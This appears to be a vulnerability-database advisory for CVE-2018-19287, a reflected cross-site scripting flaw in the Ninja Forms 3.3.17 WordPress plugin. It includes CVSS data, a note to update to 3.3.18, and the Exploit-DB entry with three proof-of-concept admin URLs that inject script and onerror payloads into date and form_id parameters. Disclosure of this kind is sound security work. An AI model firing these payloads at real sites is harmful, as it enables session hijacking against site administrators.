Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting

vendor:

Ninja Forms

by:

MTK

6.1

CVSS

MEDIUM

Cross-Site Scripting

CWE

Product Name: Ninja Forms

Affected Version From: Up to V3.3.17

Affected Version To: V3.3.17

Patch Exists: YES

Related CWE: CVE-2018-19287

CPE: a:ninjaforms:ninja_forms:3.3.17

Metasploit:

Other Scripts:

Tags: wp-plugin,wp,xss,authenticated,wpscan,edb,cve,cve2018,ninja-forms,wordpress

CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Nuclei References: https://wpscan.com/vulnerability/fb036dc2-0ee8-4a3e-afac-f52050b3f8c7, https://wordpress.org/plugins/ninja-forms/, https://www.exploit-db.com/exploits/45880, https://nvd.nist.gov/vuln/detail/CVE-2018-19287, https://plugins.trac.wordpress.org/changeset/1974335/ninja-forms/trunk/includes/Admin/Menus/Submissions.php

Nuclei Metadata: {'max-request': 2, 'verified': True, 'framework': 'wordpress', 'vendor': 'ninjaforma', 'product': 'ninja_forms'}

Platforms Tested: Debian 9 - Apache2 - Wordpress 4.9.8 - Firefox

2018

WordPress Plugin Ninja Forms 3.3.17 – Cross-Site Scripting

The Wordpress Plugin Ninja Forms version 3.3.17 is vulnerable to Cross-Site Scripting (XSS) attacks. An attacker can exploit this vulnerability by injecting malicious script code into the affected URLs. This can lead to the execution of arbitrary code or the disclosure of sensitive information to the attacker.

Mitigation:

The vendor has released an updated version of the plugin (V3.3.18) that addresses this vulnerability. It is recommended to update to the latest version to mitigate the risk.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting
# Date: 2018-11-15
# Exploit Author: MTK
# Vendor Homepage: https://ninjaforms.com
# Softwae Link: https://wordpress.org/plugins/ninja-forms/
# Version: Up to V3.3.17
# Tested on: Debian 9 - Apache2 - Wordpress 4.9.8 - Firefox
# CVE : CVE-2018-19287

# Plugin description:
# Ninja Forms is the ultimate FREE form creation tool for WordPress. Build forms within minutes 
# using a simple yet powerful drag-and-drop form creator. For beginners, quickly and easily 
# design complex forms with absolutely no code. For developers, utilize built-in hooks, 
# filters, and even custom field templates to do whatever you need at any step in 
# the form building or submission using Ninja Forms as a framework.

# POC

|_1_|

http://127.0.0.1/wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date&end_date="><img+src=mtk+onerror=alert(/MTK/);//&filter_action=Filter&paged=1&action2=-1

|_2_|

http://127.0.0.1/wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date="><img+src=mtk+onerror=alert(/MTK/);//&end_date&filter_action=Filter&paged=1&action2=-1

|_3_|

http://127.0.0.1/wp-admin/edit.php?post_status=trash&post_type=nf_sub&form_id=1"><script>alert(/MTK/);</script>&nf_form_filter&paged=1